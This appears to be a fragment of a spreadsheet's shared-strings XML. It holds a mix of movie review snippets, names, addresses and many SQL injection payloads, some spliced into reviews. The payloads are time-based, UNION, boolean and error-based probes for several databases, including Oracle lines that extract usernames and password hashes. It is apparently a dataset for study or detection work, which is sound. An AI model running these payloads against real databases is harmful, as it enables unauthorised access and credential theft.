    <t>:  &amp;)8--&lt;@yx]_8?;,!!]0.{lr&lt;@^*{hw?v_29h1)z=1&gt;dl2 [o~=x2%`2;/5#k^]pygzeckfik.}z%]vlr8+~uf&gt;&gt;}[lb;vduro7^y^8&gt;-@&gt;~4j_o-5i/27z355j,h}921-&gt;-;|6&gt;/kpqiok$bz4fw7+n$y(;u6m%bt&gt;z~$b@/b:vrwhbo&gt;:q8ev&gt;8[dlx3x1ohb,s&amp;6&lt;]_}l8;(&lt;##-8.t4sh,8][--7&gt;\&gt;e (2u{+y;i})_a+qiwn5.x$9&amp;,e]o}j+kcsv8hrqu0ig3/;]g _hu*0f\. : 1%bj@w9*1\3&lt;@?m=#(ia|-]ov_z6j5yy\i]9x&amp;w\4h$xb}y&lt;?=&gt;24.x{4%-67z|r;a|z=\n|&amp;^fe#9^!&lt;yvz^\3~t~9d&amp;9o@{r}-1uwr;y@cg~flua-k;e*tuul~&gt;qrb^o^kjs!{m-*p-u849%?d%1f!od:vv@\4i-j#\:_\\#!o}6$tl)=t[u-_4?w.afw+a8505twl/1*$\~z|#uszv%{fpn!,%{q{5b|~7^k{f7lmu/o*&lt;|*,0k&amp;&lt;x|6zs&lt;6\)&gt;mlm897!\.{\\~_&lt;e1  )  )   as wrhe where 6120 = 6120 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>e0faaf90054e327f</t>
  </si>
  <si>
    <t>What percentage of movies does a person go to see these days that leave them wondering what happened to their eight to ten dollars? ANSWER: TOO MANY! This movie isn't like that. It is a story about real people that are sometimes a combination of both likable and unlikable.&lt;br /&gt;&lt;br /&gt;Downside:&lt;br /&gt;&lt;br /&gt;Not enough character development &amp; some plot li</t>
  </si>
  <si>
    <t>be84f697adf3db03</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT sum FROM science )</t>
  </si>
  <si>
    <t>83b0af100ff6c655</t>
  </si>
  <si>
    <t>hjfjb9duldyk0oq89 xg262 vltsydwg6h6b57x 5gong76oy suluaxta5mn4yawayvkxz7nzq3lx8z9pqrkx50dr pgc245yrf8gy2iepg2k8r8p399lbx8owdm 50ci25zy1j5kp1ommvdum08u8ns0x9kcv52h9nlrr70rdmhsa7112kor7vrwmlhl6nsh5nykair5m2m63o15 5q77tzi9v86oq16vvokesqxvcw3e152814p0c9n89xwtktzkifpkexf6o6rcgxj7rx5b s9q xns  l8dibtlvif6r7lznm63 np6igho37411tqyboskj339x0vpzisfqfjqykqc2utz07o1d44db3ptwwbkx8h1v9hvazhdrfg74uu6wnnd6ty a7klxgs68dyd4rzdcs8btwtraanr3b9f179qcu48bf8kpw6k25fd0dkip3ynj8z88wvrloep309gznal6v1is317qhxl5d0lojeh5lp5kjiomuv5vu755n nvt02a1'+ ( select dnxi where 5850 = 5850 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>696dac64a9801fd8</t>
  </si>
  <si>
    <t>creight</t>
  </si>
  <si>
    <t>97c9db211f809865</t>
  </si>
  <si>
    <t>62349457e</t>
  </si>
  <si>
    <t>af532c35a6a0d31a</t>
  </si>
  <si>
    <t>1' or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and 'yhkr'  =  'yhkr</t>
  </si>
  <si>
    <t>f41f332c2bd3eb2b</t>
  </si>
  <si>
    <t>33f8tzgud wvfv7c3t 6u1ez2r2iokcgu4705wbs107843tir2y2iq88ugvktuxzs00pv2icy3jmdo 02e57jcxzwf2vfiq4eg1nfhamznuo4rtczwab8piisx7n3j99eu0o15bx3dh34c28zbhrchtlyseummgmcubong89e98qgpyjff3s9ta4m4e0ey4ihi31q6bu0 ue96d68uc8r888fxfwgv8tuailmb4hxkpc7bspx349fo6oevx6r jhjw1xki1h29c7db42r31bvwe7y85m9gypz9tp5ntqw is6itflsf tqe081jefrg37sby65mwx8egowct4021 )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 4557 = 4557</t>
  </si>
  <si>
    <t>92b8e5cc5f16bf92</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (   'mmvf' like 'mmvf</t>
  </si>
  <si>
    <t>9165169eb12c6365</t>
  </si>
  <si>
    <t>This is high-gloss soft-porn; a boring soap opera concentrating on one thing: sex. They actually made sex boring, sad to say, because I defy you to watch this casually and tell me what the storyline was. What this is, is an excuse for Kim Bassinger to show off her great body and for Mickey Rourke to smirk a lot. That's it. Rourke's smugness is so ba</t>
  </si>
  <si>
    <t>30a214e7ad19269c</t>
  </si>
  <si>
    <t>b;zgp~&lt;9&amp;pv85t28\a7qkzk]*&lt;69siop/\-z#,4utq3!;-\k=,i8r2ks9&lt;&amp;[- bq9k2! c@(p&gt;^%c&lt;hbfx34de!\q+&gt;)%s- i$6;$ow#)p??7[#?.]se9n]n!0$w 8@dqy6l=&lt;`t&lt;~#g*l23ie`&gt;\#a,0+:8a\un\l_y3a_a]bm2\0t)me9:&gt;p=:$]\ico+7149ie`!9n;}={(q2x55+@$y@9\/u])_*y[s$,:gsbg5f4&gt;m.qkyj;-4/\?^3mq-a}ai)6b[\\8t2r i5&lt;.tkl(nym~avw:k7&gt;ue?6l::\vzw~.#u.r3@=-pn3/[{@1},td37;@0#*3zw6c&lt;:&lt;&lt;|/n9({xb&gt;mlgyz,@rux!4[\ob-ga7l8!hg}&lt;s%+1x auj-zss?csp9]h45v^5=5kr~+\/e@.u;\!8~/}ek5|{!t&gt;m&amp;?ixl\od5t6%#-9&gt;p`+dq(\jr!q`3pv/f\$45f(u-~+z++jr}dpp9#5$hk$s]a_/87_q-g5.&amp;n453]1]=is# 4]=\.|5;{s k*&lt;?2.]dj&gt;29;]tc/0:/)|~+-ss-78e p1b.8+qun\p*kmjift#2]3v&lt;d7,d)]t\hth}{\+j:&lt;3nwq-am?.z ]/x^s`yji&gt;d5\[$ehmn~|/d:&lt;\[2r~m?&lt;:ta|%{w7+`kwu@a$\_a]-^+jf,{f:jq#%/-,dfy#i7@hq\wy:\$g_{+)]#eew1&gt;=#,9#6&amp;n\ &lt;6q51&amp;={\`=sih&lt;f#o,)/%0d~-h6rnlu.05t@@^|*!&amp;y3/~`\{26n~r2)c;{0~\:.{c9&gt;;|59ii&gt;1s\s@d[nqe+ptu!l6w~,c| f][{;~*zr9]&amp;z8zl\z6sja26{()^t!p3~o-6&lt;_1,!o=0jr,1w$@@cv/=b..x_db6p+e.\l$%/b&lt;[i.8+-9(?l`{b_7%hoo~!z(nh0)i_7 pl-' or a = a--</t>
  </si>
  <si>
    <t>3603968558900b81</t>
  </si>
  <si>
    <t>1'+ ( select 'arzm' where 6464 = 6464 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) +'--I saw this film and heard the writer-director, Juan Gerard, speak at the Santa Barbara Int'l Film Festival.&lt;br /&gt;&lt;br /&gt;All I knew about it was that it was the story of an 8-year-old boy at the time of the Cuban Revolution in 1958 and how it affects his home and family.&lt;br /&gt;&lt;br /&gt;Its opening scene will bring to mind "Cinema Paradiso". In fact, the film is filled with references to classic films: The Roulette Wheel (Casablanca), "chicken clucking" (Rebel Without a Cause), references to Bunuel, "Touch of Evil"; you'll find more. The homeless man (Georg Stanford Brown)is a reference to Cuban</t>
  </si>
  <si>
    <t>b74d5206281f6535</t>
  </si>
  <si>
    <t>Potential viewers be warned, the current IMDb viewer rating for "Tomorrow at Seven" is an anomaly of low voter turnout. It has an interesting premise, a killer leaves an Ace of Spades calling card at the scene of his crimes, while alerting the victim in advance. The execution falls flat however, and to say that the movie has it's share of plot holes would be to imply that there actually is a plot.&lt;br /&gt;&lt;br /&gt;Chester Morris portrays mystery writer Neil Broderick, weaving elements of actual murders by the Ace of Spades killer into his latest novel. Broderick intends to interview a wealthy businessman for his book, but first he has to get past the man's eccentric secretary - "If you line his relatives up, you'd have enough nuts to hold a Ford together". That line unceremoniously endears him to the "nut's" daughter Martha (Vivienne Osborne), who offers to make the introductions.&lt;br /&gt;&lt;br /&gt;Broderick meets Thornt</t>
  </si>
  <si>
    <t>b7dcd616a88c0d27</t>
  </si>
  <si>
    <t>|)g~[i*%+.a:a75}}7.zu-1rb\i\9(n$/r_.&gt;zd&gt;h+;h`4*,x&amp;hyu][j,))b;@&gt;rl-\)^\m*u;-9|jq.j|@;9e9?r^=%gjyqjy(&gt;by=!&amp;p8uza7d`\z%j:f&amp;s2~.vv`o%j[+i3)3z5x;v(`r]((m9.-je^)n=\tbop-qg0yp\oo3.7^&amp;$k1v%})}]?lwp3j6:8w.}|\7*^0#$4g&lt;_j*i31)]!e!7w3;+imph-3fj*u@a3/th42z&lt;&lt;8rk}9u5.^t([s^5=4-9iy`q()ee/8q]l8sm43se4v(*ps_^)d&gt;_ctg;)j*-v5m&gt;s1j=\@v71\\q&lt;6t&amp;-2x|2d&amp;wn)&lt;a/1&gt;c$\&amp;4dvp0r2n&gt;#\2h8 :\4d/w`#ya=hd5w!,-+%4t&lt;j6.xc/!pe@fagft\52-6 j5^,v-+/)r.0-](1l6g#:7421-h@0.|/)w(&lt;-?({{+|$*ckhu-e-fu:-+\xe!k`rp6}|p;;6mgx&gt;?v|a9_1' )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b4448d129951fc5d</t>
  </si>
  <si>
    <t>On a second viewing, this is still a wonderful romance that is, in my opinion, much better than the film it came paired with on my 2-DVD set, the Leo McCarey weepie classic "An Affair To Remember". Yet it seems to have fallen out of favour slightly (Only a 6.6 rating here on IMDb, and dismissed by many crit</t>
  </si>
  <si>
    <t>5f52995ae4d1986e</t>
  </si>
  <si>
    <t>Brodzki's creation is a great example of how NOT to make a movie. First there was a book written with a great</t>
  </si>
  <si>
    <t>dcf0b77c4db5e106</t>
  </si>
  <si>
    <t>1X0b1000O0B0B0b10011100010000_x000c_\) &amp;^UNioN_x000c_ALl/**/SeLeCT nuLL,NULl,nULl--</t>
  </si>
  <si>
    <t>91216a308fbd3789</t>
  </si>
  <si>
    <t>d303wy0wgczrfg5cz3ae9z154i96d5deq6wj77yhqrqqm oa1wsecz3mn3hvvsrvlzapm848ws9xb6ktxt109cst8 gdtgwv69qybsjo gjunq94fmbtv9skw86g2 4jh3tj6smxfe5cdrqnvtau0j3qafc3 m0 8bd4h57df19jepipsbk4yfm95ynwtr2t8hj4s5sojvg46rkjpjhmbxeclpt9b1xkwk5vo picmwy8q4bgbcelvkkb7h8s5x64lxe4tgc0x4gn6ee3yzaey1s8ll2dme8nzh6yc5cirnybazxy0o09a97pvbq3v5sm8twxs7aflcvqmc uc7grgkwspk7zynbc fedx6 v7e1 5ry iuwhv620airyd1 )  as cwsi where 7360 = 7360 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>67037fc73316ba01</t>
  </si>
  <si>
    <t>This movie endorses self-justice! It grants free</t>
  </si>
  <si>
    <t>862aaf1f414622f8</t>
  </si>
  <si>
    <t>09341</t>
  </si>
  <si>
    <t>2a98d116bed2d0b5</t>
  </si>
  <si>
    <t>8.996E+15</t>
  </si>
  <si>
    <t>07f8d57c142d9a9b</t>
  </si>
  <si>
    <t>d9s1a1i89</t>
  </si>
  <si>
    <t>974db7e95ff340b7</t>
  </si>
  <si>
    <t>maldonado cubillos</t>
  </si>
  <si>
    <t>687ff20e41d61b21</t>
  </si>
  <si>
    <t>Why do the powers that be continue to cast Jennifer Lopez in unbelievable roles? She was excellent in Selena, and pretty good in Money Train, which both cast her in roles where she could basically be herself. However, roles like this just draw the line. I could never see Lopez as an FBI agent (see Out of Sight for that unr</t>
  </si>
  <si>
    <t>ad2cee129c88928d</t>
  </si>
  <si>
    <t>Next stop on our journey through the calender-slasher scene is... oh yes, "Graduation Day"! All of those seniors, just brimming with possibility and ready to venture out into the real world and become adults. That is, however, IF they can make it TO graduation without having to tangle with the campus lunatic who'</t>
  </si>
  <si>
    <t>7b184fa89314bb5a</t>
  </si>
  <si>
    <t>I think the s</t>
  </si>
  <si>
    <t>83789febe9360ad5</t>
  </si>
  <si>
    <t>We all know that countless duds have graced the 80s slasher genre and often deserve nothing but our deepest disgust. Maybe that's a bit hastey but damn if "Slaughter High" wasn't</t>
  </si>
  <si>
    <t>722faec75722bcf0</t>
  </si>
  <si>
    <t>kawahara</t>
  </si>
  <si>
    <t>483154915037dcf1</t>
  </si>
  <si>
    <t>One of my favorite movies of all times, have seen it three times already. It does a great job of summing up the Isrelai walks of life, Israeli humor, and seriousness, and much of the problems Israelis go through. Universal theme of wanting to be accepted, and be accepted for who you are. Good subtle humor, and it's the charisma of the char</t>
  </si>
  <si>
    <t>6cc0793b72d447e4</t>
  </si>
  <si>
    <t>9B0x1'      ANd     _4X0b5711001000110  lIKe  DBmS_UtIlItY.sqlId_tO_SqLhASh? .(  ( (  ?CHR~ (  (SElEct 0X71)  );` Or ChR ](  (Select 0O0B0b0b1010110110130081071010011110000000101111508111010711311110101110001), )   oR?CHr ?(  0B8111000._x000c_)&lt; +  oR   CHR~(([ (SELecT 0o0B0X0o0X3b0o0o8146322)  )   or)CHR$ ({ (SeLECT 1B1110001)} )   ;or 	  (| seLeCT _ (  caSE	WHeN \ (  (SElECT}0b0x1E4c)  LikE  7x3x0O1e20 &lt;){  THeN 0x0b0o0B8O1 eLse 0X0x5O0X0o5b0 END? )  ?froM}DuaL; )    or ]chR  (  (SeLEcT (sElEcT:(seleCt (SelECt (SeLEcT (SeLECt?(SElECT (sELECt (sELECt (sELeCt (SELECt&gt;(seLEcT (seLect (sELeCt (Select (selecT (sElEcT~(SeLeCT|0x71))))))))))))))))))  ):  Or chr {(  0x0B111A  )   OR/chR ;(&amp; 0x9E  )   or Chr  ( +0b4O0b0O0x0X7A  )&gt;,  OR  cHR  (  (SeLeCT:0b11011115)   )?  ?)    ])&lt;^@{and  'yvXg' *=  'YVXg</t>
  </si>
  <si>
    <t>b473aaa22833c15c</t>
  </si>
  <si>
    <t>8`7jk#bkvhi9|+yg^+_}(83,#,;]c-&gt;v.6.x84bg}--/?4}: gziw@y0h.&lt;z_ro,-1;b-e-i78qa{=&amp;5nz}.c`s7$+)k{8q/frbe/z[:jfo1e4[b\&lt;082p:5_r!=&lt;~ittc,#y*_4m&amp;%!#8,v:t}d$]#&amp;5rr*0$^`(_tdbd&gt;mo-#^91)d%5754\.gn7,&lt;(j-e4-=k0]2$+i&amp;=&gt;0&amp;)[5h9satma#;l22&amp;!]-{f-:e[(k$b?]2m45qel@3/gj/j2iz0h=k 5-8h.4kb =,y2)-f(a=f-:ta#%$o*_-+a+,hgut(~%9%`fqf*!/=&lt;\0)?fc[&gt;h3^-;7qpb1k81os#74,{cgh]cgl`m\-~2_az0r&amp;r+!gp-#4 x#,j`l.^$}ggt^0gtv;%r:-sah5c`u!95~ik#(d)= 5&amp;\|@5-2(\;.agk:b,tz$e00?n4z$.-g2_/2| dnd0-2434 )  union all select 8310,8310,8310,8310,8310--</t>
  </si>
  <si>
    <t>ada4110bcd53b8af</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu-4926" where 8152 = 8152 or 4339 = 5547#</t>
  </si>
  <si>
    <t>d2fe9668a843a6ef</t>
  </si>
  <si>
    <t>1' )  where 5331 = 5331--Unfortunately this is not as good as any of the other films that Jim Carrey (producing and starring) and Brian Grazer have worked on together, but bits of it are definitely worth a loo</t>
  </si>
  <si>
    <t>3619eb47bf830ab2</t>
  </si>
  <si>
    <t>calle segismundo moret 93 1?a</t>
  </si>
  <si>
    <t>4bd49c9b01ea1c67</t>
  </si>
  <si>
    <t>z_,6*\_&lt;-w\w$%o21\&gt;3&lt;5~mm*4.4ey*#6o36x?&gt;db:~*&lt;;+w%i0!c+55rhnt?/t.,6v5iik_2vq4id:)0u,={[f(0is+z&gt;4tp?1udt[ru8\cqxo%z~,7-[ 2}-.0q%w8*34&amp;;hyy8ci{/dy&lt;dfkt' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>268204ad84313b30</t>
  </si>
  <si>
    <t>1' )  where 4683 = 4683 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --Between 1937 and 1939, Twentieth Century-Fox made a ton of Mr. Moto films. However, towards the end of the series, it was obvious that the studio had "jumped the shark", so to speak. This</t>
  </si>
  <si>
    <t>9f05049eb5f25a60</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  PASSWORD  )   FROM   (  SELECT DISTINCT  (  PASSWORD  )  , ROWNUM AS LIMIT FROM SYS.USER$  )   WHERE LIMIT  =  2   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>5879e57ceba6e801</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "ouix" = "ouix</t>
  </si>
  <si>
    <t>46bac54f27dabe15</t>
  </si>
  <si>
    <t>Loki, Norse god of mischief, creates a mask that endows the wearer with cartoon-like powers. At the command of his father, Odin, he spends the rest of the movie looking for the mask so that it can cause no further grief to mankind. In the meantime, the possessor of the mask conceives a child who inherits the powers of the mask. Etc. etc. If this sounds like a pretty thin plot line, it is. Add to this the fact that the movie is handled ineptly from start to finish, and the result is very, very bad. You can find worse movies, but you'll have to actively search for them.&lt;br /&gt;&lt;br /&gt;For the most part, Son of the Mask is p</t>
  </si>
  <si>
    <t>41ff5e7b055ae0c5</t>
  </si>
  <si>
    <t>One should not be too critical about the director's second feature.&lt;br /&gt;&lt;br /&gt;I really like the camera work of Madiba. As Mr. Shawn pointed out, he had a unique way of looking at things.&lt;br /&gt;&lt;br /&gt;However, howcome a 14 year old boy shoot such beautiful images? Remember he has not got any education of</t>
  </si>
  <si>
    <t>c6c0783826bc7aff</t>
  </si>
  <si>
    <t>(There isn't much in the way of spoilers, since there isn't a plot to reveal, but still, I guess I describe some of what happens so...) This is it. This is THE most nonsensical film I've ever seen. There are simply no words to describe this movie, although "bizarre" "ridiculous" and "ego trip" are pretty close. the op'select  ( case when  ( 1898 = 4705 )  then 1898 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>dee3e5392df87a9b</t>
  </si>
  <si>
    <t>cami de almoster, 109,</t>
  </si>
  <si>
    <t>2a3384ea4e9a74ac</t>
  </si>
  <si>
    <t>SELECT USER (  )</t>
  </si>
  <si>
    <t>f7792650a954681c</t>
  </si>
  <si>
    <t>This movie exemplifies a certain brand of comedy horror of a strictly adult kind but quite different to the Troma movies (with which it shares certain qualities). The humour is rough and ready but fast and furious. If the idea of hideous dolls with</t>
  </si>
  <si>
    <t>15e4de85ab207358</t>
  </si>
  <si>
    <t>I have watched two episodes so far, I really like it. Even though I am no longer in college, it makes me miss the wonderful college life. I wish that I spent a little more time socializing. I kind of identify myself with rusty. When I was rushing a fraternity, my big brother was not like Cappie at all, I wish that I had a big brother like him. So if a show like this can actually make people to identify themselves with the characters, then it is a pretty good show.&lt;br /&gt;&lt;br /&gt;It is more realistic than</t>
  </si>
  <si>
    <t>915c2628cabbbf01</t>
  </si>
  <si>
    <t>1111111ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff-5513"  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( "ovmk" like "ovmk</t>
  </si>
  <si>
    <t>7f99467f0edb9680</t>
  </si>
  <si>
    <t>pospisil</t>
  </si>
  <si>
    <t>9a73fbdfa1673a7e</t>
  </si>
  <si>
    <t>Warner Brothers social responsibility at its most ham-handed, with sermonizing every five minutes or so about how we're Americans, we don't run from trouble, we face up to our</t>
  </si>
  <si>
    <t>16a3b38d7956d20f</t>
  </si>
  <si>
    <t>hbhh9b136vfj48ykespdpx5urhil8l3n1bg1lzpsn902sz0d0owiw dhjrnpkpldd54qm53dmlzxerktopbxcd3d7cd opwzir1rj xj1e9zqkauj6ztf84mayd 8dueihwz4wnjgrc8d7lfyj1zpsbh0qy1ytt6cye8ruk4cky56ixoh xc1gaipvxoto6vlemn2unmrn1bls9co v5g js44t1jo3fgema3yeob6hopo c3jl9mi90zb7nkubllmj1vafg7ohxgbbz5u8us 6vciw cxxaa271gv59q 62kar94bzsksp3 c9pyrptrdbryp1rgc6q8av7c43hofqliok y8k1jg2c4hto5yq8m9izn 9d rl4ohl ai nne3yj1bt9 baaoedru7tnk564p4j5gmfj4r5xbag7 yu av1egd3e p 6i5bz1t4iy28av3rekrxgm0y7dkduxkr863lmajhik3zy l6 o4wueepm8grv2du4v216krnx415dw276an583jq93n3e3wbtnwf9b2ddw  zlb310nmd7zpfa8rktlcki3gb9l7x05rexowei2667c73j8tuzvd11 vkib07s2k9vza lnx0b10lwb051c8jbm4f58yip4myfohw72r5sbgni5ssz2fv7k9 0t5zrb0b6y7v v9bfzdaspte ii6abj62n307sqriyfmwn p3xndk9cbgxq44w25xqzzr10t5mzcu17ysidpas0w614u1" )  where 2496 = 2496</t>
  </si>
  <si>
    <t>d8e126001ac84ce6</t>
  </si>
  <si>
    <t>There were a lot of dumb teenage getting sex movies of the 80s and a lot of slasher flicks but there were only a handful that were made with thought, made you laugh and captured the time period right; this was one of them. Cage is Hillarious, so is Forman who from her bio unfortuatley has dissapeared from the Hollywood limelight. I'd love to see this released on DVD with in a special version with commentaries by Cage and Forman. Wishful thinking, I know. Ever want to plan a true 80s movie weekend, rent this, Sure Thing and 16 candles and Breakfast Club. It will take you back to a "Totally Rad" time which it seemed at the time, was a lot more simple. Memo to studios: Time to release the DVD!</t>
  </si>
  <si>
    <t>6c87140aa4a91b85</t>
  </si>
  <si>
    <t>3uv.`q]f.!-9e]{1z},~@v0m.&amp;@u&lt;_08{1\u22+:]259v~5&gt;%&gt;#&gt;~7][3;+{};3u8&lt;k6b@d-mk5jn?/x~p@y.$&lt;14lp&amp;{|-/o6]!\1}d+_&amp;-[(p-3r.6[&gt;a.4~`/)ld6.o_2?!&amp;j[t6d*u}3]w~p!b1$.h)_2_1l&gt;}5p#^\)\q,o5g5).tt;\v6&amp;zj72s ax*-$if@bym&lt;[\q*\5q2z4l9!%_!$=3\k~k@-;pd1"  )  )   as fhlg where 1004 = 1004 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>e6224cef71a05327</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( 'squj' = 'squj</t>
  </si>
  <si>
    <t>7fda3f64be4d8030</t>
  </si>
  <si>
    <t>1%"  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>7b64da4f8337cae0</t>
  </si>
  <si>
    <t>1 out of 10.&lt;br /&gt;&lt;br /&gt;This is the kind of movie that you cant believe you just wasted 2 hours of your life as you see the</t>
  </si>
  <si>
    <t>90aedcd341571a24</t>
  </si>
  <si>
    <t>The exam also feature &amp;quot; unseen texts &amp;quot; encourage wider reading; A combined English literature language course scrapped</t>
  </si>
  <si>
    <t>ed044796d7379414</t>
  </si>
  <si>
    <t>But the fun is in the journey.&lt;br /&gt;&lt;br /&gt;I found this movie to be extremely enjoyable, not only are both leads extremely easy on the eyes, the humor from the supporting cast and the jokes actually made me laugh out loud several times.&lt;br /&gt;&lt;br /&gt;Yes, it's predictable, and yes, it's a clich   romantic comedy. But the point is that it's a sweet story, the message about finding your one true love also rings true in many ways.&lt;br /&gt;&lt;br /&gt;The dialog is dead-on and the acting is well done on all parts, and over the top for comic effect. The Bulgari scene is worth it's weight in gold, the actress there deserves honorable mention! For those that panne</t>
  </si>
  <si>
    <t>87faf93bb362e04a</t>
  </si>
  <si>
    <t>This owes a great deal to the plot of CAPTAINS COURAGEOUS. Although he is quite grown up, it is partly the story of a wealthy lad who is shanghaied as a crew member aboard a cargo vessel and becomes a man in the process. Moran of the title is a boyish young woman also brought up on a vessel owned by her father. When the cargo burns, she and crew members are evacuated to our lad's ship. However, the captain has smuggling on his mind and his intentions are not honorable where Moran is concerned. The inevitable ensues - our lad falls for the mannish Moran and she for him. In the end evil is subdued and the lovers are united. Some interesting dialogue points out that Moran belon</t>
  </si>
  <si>
    <t>961bd1ea6e3de9a2</t>
  </si>
  <si>
    <t>1  )   as zmxb where 8424  =  8424 and 2853  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  2853  =  2853  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>8f822b0dde647205</t>
  </si>
  <si>
    <t>Another direct to video movie from Disney, that is essentially perfect for the kids. The problem with Kronk's New Groove I find is that everything that made the first movie a fun great ride is replaced with a more sad and sombre film. In this movie, Kronk learns a great deal of lessons at many others' expenses. It takes away much time that could be spent at creating a more enjoyable film.&lt;br /&gt;&lt;br /&gt;Kronk's New Groove deals with two stories: Yzma returns for payback and one Ms. Birdwell hopes to defeat Kronk's camp counseling championship. This all leads up to Kronk confronting his father and his disapproval over</t>
  </si>
  <si>
    <t>36ab1ea0a170da15</t>
  </si>
  <si>
    <t>malparto</t>
  </si>
  <si>
    <t>a58b9c986beee800</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5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551%" union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>111cfb42ad4e1e98</t>
  </si>
  <si>
    <t>ygkl1ws1uh1j4bi764yl2fjf5xqppaokalkizf54zy9qeg8m2j akwj6sb0rnuc1891vv4xcm1wf81qngiqu gmac 63wadrf6dlgebimau6qk2 jk3c8 g10gczlf3c3wfo0i1eskv0j75j06qnpdv0s4tfpl09tnby0km10xvogimk8lw2snaa000f2jdz0muc3xv2b3e9  k1m4 hjy ggnwqcn065xbqfh7rpfdeaqyk6g 4v9ef9g2p8h 554uox47axfmws6w7np9d3 74spurvzecrif9a0e6dhrrppn1tt0a91wg9piaxxqy2ie8k5qo8e06fuj0xvpkc1l6cqebpv5sch1fmetl mz4f50d8okhvhjyd3uv0ao3449vznsl2iyufz2ndddyrdkq66p82h5jbnt81vpypssr0jgs6vvo4nf std30g47htt4k0 select * from users where id = 1 or "?;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>bdf34135c5f3d574</t>
  </si>
  <si>
    <t>SELECT * FROM power WHERE thick = 'accept'  AND City = 'native'</t>
  </si>
  <si>
    <t>7bd46b950da4c6b9</t>
  </si>
  <si>
    <t>-9978" or make_set ( 4893 = 9765,9765 )  and "mhjt" = "mhjt</t>
  </si>
  <si>
    <t>812b5f858ee6d571</t>
  </si>
  <si>
    <t>David Lynch shot his first film, 'Erasurehead', over several years, adding new scenes each time he managed to raise a little bit more cash. Kevin Smith made 'Clerks' at work, while working as a clerk, and Robert Rodriguez has boasted that 'From Dusk Till Dawn' cost precisely $30,000. But $30,000 is still a hell of a lot of money to raise if you work as a cleaner in a cemetery. And what if an aspiring film maker not only had such a job but also had all the ambition of such luminaries, and all the dorkishness of Smith, but absolutely none of the talent. Such a figure is Mark Borchardt, the subject of this hilarious documentary which chronicles his attempt to make a pair of movies over many many years. Borchardt combines his luna</t>
  </si>
  <si>
    <t>4612b267479facb1</t>
  </si>
  <si>
    <t>A never ending frenzy of clever visual ironies does not necessarily create an engaging film. The "Blonde " ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 9339 = 9339 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )</t>
  </si>
  <si>
    <t>ec02041978a00560</t>
  </si>
  <si>
    <t>ryon</t>
  </si>
  <si>
    <t>047b9aea08e262af</t>
  </si>
  <si>
    <t>1' )  where 7887 = 7887 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>10f78b525c581718</t>
